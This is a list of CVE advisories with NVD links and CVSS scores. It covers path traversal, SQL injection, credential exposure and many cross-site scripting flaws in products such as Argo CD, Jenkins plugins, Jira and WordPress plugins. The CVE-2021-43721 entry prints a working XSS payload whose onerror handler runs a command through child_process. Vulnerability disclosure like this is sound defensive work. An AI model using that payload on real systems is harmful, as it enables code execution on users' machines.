CVE-2022-24730 Argo CD is a declarative, GitOps continuous delivery tool for Kubernetes. Argo CD starting with version 1.3.0 but before versions 2.1.11, 2.2.6, and 2.3.0 is vulnerable to a path traversal bug, compounded by an improper access control bug, allowing a malicious user with read-only repository access to leak sensitive files from Argo CD's repo-server. A malicious Argo CD user who has been granted `get` access for a repository containing a Helm chart can craft an API request to the `/api/v1/repositories/{repo_url}/appdetails` endpoint to leak the contents of out-of-bounds files from the repo-server. The malicious payload would reference an out-of-bounds file, and the contents of that file would be returned as part of the response. Contents from a non-YAML file may be returned as part of an error message. The attacker would have to know or guess the location of the target file. Sensitive files which could be leaked include files from other Applications' source repositories or any secrets which have been mounted as files on the repo-server. This vulnerability is patched in Argo CD versions 2.1.11, 2.2.6, and 2.3.0. The patches prevent path traversal and limit access to users who either A) have been granted Application `create` privileges or B) have been granted Application `get` privileges and are requesting details for a `repo_url` that has already been used for the given Application. There are currently no known workarounds. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24730
CVE-2020-20093 The Facebook Messenger app for iOS 227.0 and prior and Android 228.1.0.10.116 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-20093
CVE-2020-20094 Instagram iOS 106.0 and prior and Android 107.0.0.11 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-20094
CVE-2020-20095 iMessage (Messages app) iOS 12.4 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-20095
CVE-2020-20096 Whatsapp iOS 2.19.80 and prior and Android 2.19.222 and prior user interface does not properly represent URI messages to the user, which results in URI spoofing via specially crafted messages. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2020-20096
CVE-2021-3582 A flaw was found in the QEMU implementation of VMWare's paravirtual RDMA device. The issue occurs while handling a "PVRDMA_CMD_CREATE_MR" command due to improper memory remapping (mremap). This flaw allows a malicious guest to crash the QEMU process on the host. The highest threat from this vulnerability is to system availability. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3582
CVE-2021-3941 In ImfChromaticities.cpp routine RGBtoXYZ(), there are some division operations such as `float Z = (1 - chroma.white.x - chroma.white.y) * Y / chroma.white.y;` and `chroma.green.y * (X + Z))) / d;` but the divisor is not checked for a 0 value. A specially crafted file could trigger a divide-by-zero condition which could affect the availability of programs linked with OpenEXR. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-3941
CVE-2022-25590 SurveyKing v0.2.0 was discovered to retain users' session cookies after logout, allowing attackers to login to the system and access data using the browser cache when the user exits the application. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-25590
CVE-2022-26252 aaPanel v6.8.21 was discovered to be vulnerable to directory traversal. This vulnerability allows attackers to obtain the root user private SSH key(id_rsa). 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-26252
CVE-2021-45491 3CX System through 2022-03-17 stores cleartext passwords in a database. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-45491
CVE-2022-0549 An issue has been discovered in GitLab CE/EE affecting all versions before 14.3.6, all versions starting from 14.4 before 14.4.4, all versions starting from 14.5 before 14.5.2. Under certain conditions, GitLab REST API may allow unprivileged users to add other users to groups even if that is not possible to do through the Web UI. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-0549
CVE-2022-24956 An issue was discovered in Shopware B2B-Suite through 4.4.1. The sort-by parameter of the search functionality of b2border and b2borderlist allows SQL injection. Possible techniques are boolean-based blind, time-based blind, and potentially stacked queries. The vulnerability allows a remote authenticated attacker to dump the underlying database. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-24956
CVE-2022-28135 Jenkins instant-messaging Plugin 1.41 and earlier stores passwords for group chats unencrypted in the global configuration file of plugins based on Jenkins instant-messaging Plugin on the Jenkins controller where they can be viewed by users with access to the Jenkins controller file system. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28135
CVE-2022-28141 Jenkins Proxmox Plugin 0.5.0 and earlier stores the Proxmox Datacenter password unencrypted in the global config.xml file on the Jenkins controller where it can be viewed by users with access to the Jenkins controller file system. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28141
CVE-2022-28143 A cross-site request forgery (CSRF) vulnerability in Jenkins Proxmox Plugin 0.7.0 and earlier allows attackers to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28143
CVE-2022-28144 Jenkins Proxmox Plugin 0.7.0 and earlier does not perform a permission check in several HTTP endpoints, allowing attackers with Overall/Read permission to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28144
CVE-2022-28146 Jenkins Continuous Integration with Toad Edge Plugin 2.3 and earlier allows attackers with Item/Configure permission to read arbitrary files on the Jenkins controller by specifying an input folder on the Jenkins controller as a parameter to its build steps. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28146
CVE-2022-28148 The file browser in Jenkins Continuous Integration with Toad Edge Plugin 2.3 and earlier may interpret some paths to files as absolute on Windows, resulting in a path traversal vulnerability allowing attackers with Item/Read permission to obtain the contents of arbitrary files on Windows controllers. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28148
CVE-2022-28156 Jenkins Pipeline: Phoenix AutoTest Plugin 1.3 and earlier allows attackers with Item/Configure permission to copy arbitrary files and directories from the Jenkins controller to the agent workspace. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28156
CVE-2022-28157 Jenkins Pipeline: Phoenix AutoTest Plugin 1.3 and earlier allows attackers with Item/Configure permission to upload arbitrary files from the Jenkins controller via FTP to an attacker-specified FTP server. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28157
CVE-2022-28158 A missing permission check in Jenkins Pipeline: Phoenix AutoTest Plugin 1.3 and earlier allows attackers with Overall/Read permission to enumerate credentials IDs of credentials stored in Jenkins. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28158
CVE-2022-28160 Jenkins Tests Selector Plugin 1.3.3 and earlier allows users with Item/Configure permission to read arbitrary files on the Jenkins controller. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-28160
CVE-2021-43701 CSZ CMS 1.2.9 has a Time and Boolean-based Blind SQL Injection vulnerability in the endpoint /admin/export/getcsv/article_db, via the fieldS[] and orderby parameters. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43701
CVE-2021-41594 In RSA Archer 6.9.SP1 P3, if some application functions are precluded by the Administrator, this can be bypassed by intercepting the API request at the /api/V2/internal/TaskPermissions/CheckTaskAccess endpoint. If the parameters of this request are replaced with empty fields, the attacker achieves access to the precluded functions. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-41594
CVE-2022-26949 Archer 6.x through 6.9 SP2 P1 (6.9.2.1) contains an improper access control vulnerability on attachments. A remote authenticated malicious user could potentially exploit this vulnerability to gain access to files that should only be allowed by extra privileges. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-26949
CVE-2022-23869 In RuoYi v4.7.2 through the WebUI, user test1 does not have permission to reset the password of user test3, but the password of user test3 can be reset through the /system/user/resetPwd request. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2022-23869
CVE-2021-40644 An SQL Injection vulnerability exists in oasys oa_system as of 9/7/2021 in resources/mappers/notice-mapper.xml. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-40644
CVE-2021-38362 In RSA Archer 6.x through 6.9 SP3 (6.9.3.0), an authenticated attacker can make a GET request to a REST API endpoint that is vulnerable to an Insecure Direct Object Reference (IDOR) issue and retrieve sensitive data. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-38362
CVE-2021-46006 In Totolink A3100R V5.9c.4577, "test.asp" contains an API-like function, which is not authenticated. Using this function, an attacker can configure multiple settings without authentication. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-46006
CVE-2021-43662 totolink EX300_v2, ver V4.0.3c.140_B20210429 and A720R ,ver V4.1.5cu.470_B20200911 have an issue which causes uncontrolled resource consumption. 6.5 https://nvd.nist.gov/vuln/detail/CVE-2021-43662
CVE-2019-11738 If a Content Security Policy (CSP) directive is defined that uses a hash-based source that takes the empty string as input, execution of any javascript\: URIs will be allowed. This could allow for malicious JavaScript content to be run, bypassing CSP permissions. This vulnerability affects Firefox < 69 and Firefox ESR < 68.1. 6.3 https://nvd.nist.gov/vuln/detail/CVE-2019-11738
CVE-2020-1945 Apache Ant 1.1 to 1.9.14 and 1.10.0 to 1.10.7 uses the default temporary directory identified by the Java system property java.io.tmpdir for several tasks and may thus leak sensitive information. The fixcrlf and replaceregexp tasks also copy files from the temporary directory back into the build tree allowing an attacker to inject modified source files into the build process. 6.3 https://nvd.nist.gov/vuln/detail/CVE-2020-1945
CVE-2021-3631 A flaw was found in libvirt while it generates SELinux MCS category pairs for VMs' dynamic labels. This flaw allows one exploited guest to access files labeled for another guest, resulting in the breaking out of sVirt confinement. The highest threat from this vulnerability is to confidentiality and integrity. 6.3 https://nvd.nist.gov/vuln/detail/CVE-2021-3631
CVE-2022-21820 NVIDIA DCGM contains a vulnerability in nvhostengine, where a network user can cause detection of error conditions without action, which may lead to limited code execution, some denial of service, escalation of privileges, and limited impacts to both data confidentiality and integrity. 6.3 https://nvd.nist.gov/vuln/detail/CVE-2022-21820
CVE-2019-11454 Persistent cross-site scripting (XSS) in http/cervlet.c in Tildeslash Monit before 5.25.3 allows a remote unauthenticated attacker to introduce arbitrary JavaScript via manipulation of an unsanitized user field of the Authorization header for HTTP Basic Authentication, which is mishandled during an _viewlog operation. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2019-11454
CVE-2017-1002201 In haml versions prior to version 5.0.0.beta.2, when using user input to perform tasks on the server, characters like < > " ' must be escaped properly. In this case, the ' character was missed. An attacker can manipulate the input to introduce additional attributes, potentially executing code. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2017-1002201
CVE-2020-7106 Cacti 1.2.8 has stored XSS in data_sources.php, color_templates_item.php, graphs.php, graph_items.php, lib/api_automation.php, user_admin.php, and user_group_admin.php, as demonstrated by the description parameter in data_sources.php (a raw string from the database that is displayed by $header to trigger the XSS). 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-7106
CVE-2020-11023 In jQuery versions greater than or equal to 1.0.3 and before 3.5.0, passing HTML containing <option> elements from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-11023
CVE-2020-11022 In jQuery versions greater than or equal to 1.2 and before 3.5.0, passing HTML from untrusted sources - even after sanitizing it - to one of jQuery's DOM manipulation methods (i.e. .html(), .append(), and others) may execute untrusted code. This problem is patched in jQuery 3.5.0. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-11022
CVE-2020-4022 The attachment download resource in Atlassian Jira Server and Data Center before 8.5.5, and from 8.6.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability issue attachments with a mixed multipart content type. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-4022
CVE-2019-20417 NOTE: This candidate is a duplicate of CVE-2019-15011. All CVE users should reference CVE-2019-15011 instead of this candidate. All references and descriptions in this candidate have been removed to prevent accidental usage. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2019-20417
CVE-2020-9496 XML-RPC request are vulnerable to unsafe deserialization and Cross-Site Scripting issues in Apache OFBiz 17.12.03 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-9496
CVE-2020-36236 Affected versions of Atlassian Jira Server and Data Center allow remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the ViewWorkflowSchemes.jspa and ListWorkflows.jspa endpoints. The affected versions are before version 8.5.11, from version 8.6.0 before 8.13.3, and from version 8.14.0 before 8.15.0. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36236
CVE-2020-36288 The issue navigation and search view in Jira Server and Data Center before version 8.5.12, from version 8.6.0 before version 8.13.4, and from version 8.14.0 before version 8.15.1 allows remote attackers to inject arbitrary HTML or JavaScript via a DOM Cross-Site Scripting (XSS) vulnerability caused by parameter pollution. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-36288
CVE-2021-26079 The CardLayoutConfigTable component in Jira Server and Jira Data Center before version 8.5.15, and from version 8.6.0 before version 8.13.7, and from version 8.14.0 before 8.17.0 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-26079
CVE-2021-26080 EditworkflowScheme.jspa in Jira Server and Jira Data Center before version 8.5.14, and from version 8.6.0 before version 8.13.6, and from 8.14.0 before 8.16.1 allows remote attackers to inject arbitrary HTML or JavaScript via a cross site scripting (XSS) vulnerability. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-26080
CVE-2021-29106 A reflected Cross Site Scripting (XSS) vulnerability in Esri ArcGIS Server version 10.8.1 and below may allow a remote attacker able to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the user’s browser. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-29106
CVE-2021-29107 A stored Cross Site Scripting (XXS) vulnerability in ArcGIS Server Manager version 10.8.1 and below may allow a remote unauthenticated attacker to pass and store malicious strings in the ArcGIS Server Manager application. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-29107
CVE-2021-29103 A reflected Cross Site Scripting (XXS) vulnerability in ArcGIS Server version 10.8.1 and below may allow a remote attacker able to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the user’s browser. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-29103
CVE-2021-29104 A stored Cross Site Scripting (XXS) vulnerability in ArcGIS Server Manager version 10.8.1 and below may allow a remote unauthenticated attacker to pass and store malicious strings in the ArcGIS Server Manager application. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-29104
CVE-2020-23226 Multiple Cross Site Scripting (XSS) vulneratiblities exist in Cacti 1.2.12 in (1) reports_admin.php, (2) data_queries.php, (3) data_input.php, (4) graph_templates.php, (5) graphs.php, (6) reports_admin.php, and (7) data_input.php. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2020-23226
CVE-2021-39111 The Editor plugin in Atlassian Jira Server and Data Center before version 8.5.18, from 8.6.0 before 8.13.10, and from version 8.14.0 before 8.18.2 allows remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the handling of supplied content such as from a PDF when pasted into a field such as the description field. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-39111
CVE-2021-29109 A reflected XSS vulnerability in Esri Portal for ArcGIS version 10.9 and below may allow a remote attacker able to convince a user to click on a crafted link which could potentially execute arbitrary JavaScript code in the user’s browser. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-29109
CVE-2021-41304 Affected versions of Atlassian Jira Server and Data Center allow anonymous remote attackers to inject arbitrary HTML or JavaScript via a Cross-Site Scripting (XSS) vulnerability in the /secure/admin/ImporterFinishedPage.jspa error message. The affected versions are before version 8.13.12, and from version 8.14.0 before 8.20.2. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-41304
CVE-2021-29116 A stored Cross Site Scripting (XSS) vulnerability in Esri ArcGIS Server feature services versions 10.8.1 and 10.9 (only) feature services may allow a remote, unauthenticated attacker to pass and store malicious strings via crafted queries which when accessed could potentially execute arbitrary JavaScript code in the user’s browser. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-29116
CVE-2021-46144 Roundcube before 1.4.13 and 1.5.x before 1.5.2 allows XSS via an HTML e-mail message with crafted Cascading Style Sheets (CSS) token sequences. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-46144
CVE-2022-0571 Cross-site Scripting (XSS) - Reflected in GitHub repository phoronix-test-suite/phoronix-test-suite prior to 10.8.2. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0571
CVE-2022-0321 The WP Voting Contest WordPress plugin before 3.0 does not sanitise and escape the post_id parameter before outputting it back in the response via the wpvc_social_share_icons AJAX action (available to both unauthenticated and authenticated users), leading to a Reflected Cross-Site Scripting issue 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0321
CVE-2021-27418 GE UR firmware versions prior to version 8.1x supports web interface with read-only access. The device fails to properly validate user input, making it possible to perform cross-site scripting attacks, which may be used to send a malicious script. Also, UR Firmware web server does not perform HTML encoding of user-supplied strings. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-27418
CVE-2022-24776 Flask-AppBuilder is an application development framework, built on top of the Flask web framework. Flask-AppBuilder contains an open redirect vulnerability when using database authentication login page on versions below 3.4.5. This issue is fixed in version 3.4.5. There are currently no known workarounds. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-24776
CVE-2021-46426 phpIPAM 1.4.4 allows Reflected XSS and CSRF via app/admin/subnets/find_free_section_subnets.php of the subnets functionality. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-46426
CVE-2021-20290 An improper authorization handling flaw was found in Foreman. The OpenSCAP plugin for the smart-proxy allows foreman clients to execute actions that should be limited to the Foreman Server. This flaw allows an authenticated local attacker to access and delete limited resources and also causes a denial of service on the Foreman server. The highest threat from this vulnerability is to integrity and system availability. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-20290
CVE-2022-25610 Unauthenticated Stored Cross-Site Scripting (XSS) in Simple Ajax Chat <= 20220115 allows an attacker to store the malicious code. However, the attack requires specific conditions, making it hard to exploit. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-25610
CVE-2022-26573 Maccms v10 was discovered to contain multiple reflected cross-site scripting (XSS) vulnerabilities in /admin.php/admin/art/data.html via the select and input parameters. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26573
CVE-2022-27884 Maccms v10 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in /admin.php/admin/plog/index.html via the wd parameter. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-27884
CVE-2022-27885 Maccms v10 was discovered to contain multiple reflected cross-site scripting (XSS) vulnerabilities in /admin.php/admin/website/data.html via the select and input parameters. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-27885
CVE-2022-27886 Maccms v10 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in /admin.php/admin/ulog/index.html via the wd parameter. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-27886
CVE-2022-27887 Maccms v10 was discovered to contain a reflected cross-site scripting (XSS) vulnerability in /admin.php/admin/vod/data.html via the repeat parameter. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-27887
CVE-2022-27920 libkiwix 10.0.0 and 10.0.1 allows XSS in the built-in webserver functionality via the search suggestions URL parameter. This is fixed in 10.1.0. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-27920
CVE-2021-40906 CheckMK Raw Edition software (versions 1.5.0 to 1.6.0) does not sanitise the input of a web service parameter that is in an unauthenticated zone. This Reflected XSS allows an attacker to open a backdoor on the device with HTML content and interpreted by the browser (such as JavaScript or other client-side scripts) or to steal the session cookies of a user who has previously authenticated via a man in the middle. Successful exploitation requires access to the web service resource without authentication. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-40906
CVE-2021-44208 OX App Suite through 7.10.5 allows XSS via an unknown system message in Chat. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-44208
CVE-2021-44209 OX App Suite through 7.10.5 allows XSS via an HTML 5 element such as AUDIO. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-44209
CVE-2021-44210 OX App Suite through 7.10.5 allows XSS via NIFF (Notation Interchange File Format) data. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-44210
CVE-2021-44212 OX App Suite through 7.10.5 allows XSS via a trailing control character such as the SCRIPT\\t substring. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-44212
CVE-2021-44213 OX App Suite through 7.10.5 allows XSS via uuencoding in a multipart/alternative message. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-44213
CVE-2021-43725 There is a Cross Site Scripting (XSS) vulnerability in SpotPage_login.php of Spotweb 1.5.1 and below, which allows remote attackers to inject arbitrary web script or HTML via the data[performredirect] parameter. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-43725
CVE-2021-43721 Leanote 2.7.0 is vulnerable to Cross Site Scripting (XSS) in the markdown type note. This leads to remote code execution with payload : <video src=x onerror=(function(){require('child_process').exec('calc');})();> 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-43721
CVE-2021-24746 The Social Sharing Plugin WordPress plugin before 3.3.40 does not escape the viewed post URL before outputting it back in onclick attributes when the "Enable 'More' icon" option is enabled (which is the default setting), leading to a Reflected Cross-Site Scripting issue. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-24746
CVE-2021-25012 The Pz-LinkCard WordPress plugin through 2.4.4.4 does not sanitise and escape multiple parameters before outputting them back in admin dashboard pages, leading to Reflected Cross-Site Scripting issues 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-25012
CVE-2021-25071 The WordPress plugin through 2.0.1 does not sanitise and escape the translation parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-25071
CVE-2022-0599 The Mapping Multiple URLs Redirect Same Page WordPress plugin through 5.8 does not sanitize and escape the mmursp_id parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0599
CVE-2022-0600 The Conference Scheduler WordPress plugin before 2.4.3 does not sanitize and escape the tab parameter before outputting back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0600
CVE-2022-0619 The Database Peek WordPress plugin through 1.2 does not sanitize and escape the match parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0619
CVE-2022-0620 The Delete Old Orders WordPress plugin through 0.2 does not sanitize and escape the date parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0620
CVE-2022-0621 The dTabs WordPress plugin through 1.4 does not sanitize and escape the tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0621
CVE-2022-0641 The Popup Like box WordPress plugin before 3.6.1 does not sanitize and escape the ays_fb_tab parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0641
CVE-2022-0643 The Bank Mellat WordPress plugin through 1.3.7 does not sanitize and escape the orderId parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0643
CVE-2022-0647 The Bulk Creator WordPress plugin through 1.0.1 does not sanitize and escape the post_type parameter before outputting it back in an admin page, leading to a Reflected Cross-Site Scripting. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0647
CVE-2022-0680 The Plezi WordPress plugin before 1.0.3 has a REST endpoint allowing unauthenticated users to update the plz_configuration_tracker_enable option, which is then displayed in the admin panel without sanitisation and escaping, leading to a Stored Cross-Site Scripting issue 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0680
CVE-2022-0818 The WooCommerce Affiliate Plugin WordPress plugin before 4.16.4.5 does not have authorization and CSRF checks on a specific action handler, as well as does not sanitize its settings, which enables an unauthenticated attacker to inject malicious XSS payloads into the settings page of the plugin. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0818
CVE-2022-0283 An issue has been discovered affecting GitLab versions prior to 13.5. An open redirect vulnerability was fixed in GitLab integration with Jira that a could cause the web application to redirect the request to the attacker specified URL. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-0283
CVE-2022-26980 Teampass 2.1.26 allows reflected XSS via the index.php PATH_INFO. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26980
CVE-2022-1076 A vulnerability was found in Automatic Question Paper Generator System 1.0. It has been classified as problematic. This affects the file /aqpg/users/login.php of the component My Account Page. The manipulation of the argument First Name/Middle Name/Last Name leads to cross site scripting. It is possible to initiate the attack remotely. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-1076
CVE-2022-1079 A vulnerability classified as problematic has been found in SourceCodester One Church Management System. Affected are multiple files and parameters which are prone to to cross site scripting. It is possible to launch the attack remotely. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-1079
CVE-2022-1081 A vulnerability was found in SourceCodester Microfinance Management System 1.0. It has been declared as problematic. This vulnerability affects the file /mims/app/addcustomerHandler.php. The manipulation of the argument first_name, middle_name, and surname leads to cross site scripting. The attack can be initiated remotely. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-1081
CVE-2022-1085 A vulnerability was found in CLTPHP up to 6.0. It has been declared as problematic. Affected by this vulnerability is the POST Parameter Handler. The manipulation leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-1085
CVE-2021-42970 Cross Site Scripting (XSS) vulnerability exists in cxuucms v3 via the imgurl of /feedback/post/ content parameter. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-42970
CVE-2022-26950 Archer 6.x through 6.9 P2 (6.9.0.2) is affected by an open redirect vulnerability. A remote unprivileged attacker may potentially redirect legitimate users to arbitrary web sites and conduct phishing attacks. The attacker could then steal the victims' credentials and silently authenticate them to the Archer application without the victims realizing an attack occurred. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26950
CVE-2022-26951 Archer 6.x through 6.10 (6.10.0.0) contains a reflected XSS vulnerability. A remote SAML-unauthenticated malicious Archer user could potentially exploit this vulnerability by tricking a victim application user into supplying malicious HTML or JavaScript code to the vulnerable web application; the malicious code is then reflected back to the victim and gets executed by the web browser in the context of the vulnerable web application. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26951
CVE-2022-28202 An XSS issue was discovered in MediaWiki before 1.35.6, 1.36.x before 1.36.4, and 1.37.x before 1.37.2. The widthheight, widthheightpage, and nbytes properties of messages are not escaped when used in galleries or Special:RevisionDelete. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-28202
CVE-2022-24131 DouPHP v1.6 Release 20220121 is affected by Cross Site Scripting (XSS) through /admin/login.php in the background, which will lead to JavaScript code execution. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-24131
CVE-2022-23796 An issue was discovered in Joomla! 3.7.0 through 3.10.6. Lack of input validation could allow an XSS attack using com_fields. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-23796
CVE-2022-23798 An issue was discovered in Joomla! 2.5.0 through 3.10.6 & 4.0.0 through 4.1.0. Inadequate validation of URLs could result into an invalid check whether an redirect URL is internal or not. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-23798
CVE-2022-23800 An issue was discovered in Joomla! 4.0.0 through 4.1.0. Inadequate content filtering leads to XSS vulnerabilities in various components. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-23800
CVE-2022-23801 An issue was discovered in Joomla! 4.0.0 through 4.1.0. Possible XSS atack vector through SVG embedding in com_media. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-23801
CVE-2022-24135 QingScan 1.3.0 is affected by Cross Site Scripting (XSS) vulnerability in all search functions. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-24135
CVE-2022-26644 Online Banking System Protect v1.0 was discovered to contain multiple cross-site scripting (XSS) vulnerabilities via parameters on user profile, system_info and accounts management. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2022-26644
CVE-2021-43661 totolink EX300_v2 V4.0.3c.140_B20210429 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via the component /home.asp. 6.1 https://nvd.nist.gov/vuln/detail/CVE-2021-43661
CVE-2020-1711 An out-of-bounds heap buffer access flaw was found in the way the iSCSI Block driver in QEMU versions 2.12.0 before 4.2.1 handled a response coming from an iSCSI server while checking the status of a Logical Address Block (LBA) in an iscsi_co_block_status() routine. A remote user could use this flaw to crash the QEMU process, resulting in a denial of service or potential execution of arbitrary code with privileges of the QEMU process on the host. 6 https://nvd.nist.gov/vuln/detail/CVE-2020-1711
CVE-2019-7282 In NetKit through 0.17, rcp.c in the rcp client allows remote rsh servers to bypass intended access restrictions via the filename of . or an empty filename. The impact is modifying the permissions of the target directory on the client side. This is similar to CVE-2018-20685. 5.9 https://nvd.nist.gov/vuln/detail/CVE-2019-7282
CVE-2020-14168 The email client in Jira Server and Data Center before version 7.13.16, from 8.5.0 before 8.5.7, from 8.8.0 before 8.8.2, and from 8.9.0 before 8.9.1 allows remote attackers to access outgoing emails between a Jira instance and the SMTP server via man-in-the-middle (MITM) vulnerability. 5.9 https://nvd.nist.gov/vuln/detail/CVE-2020-14168
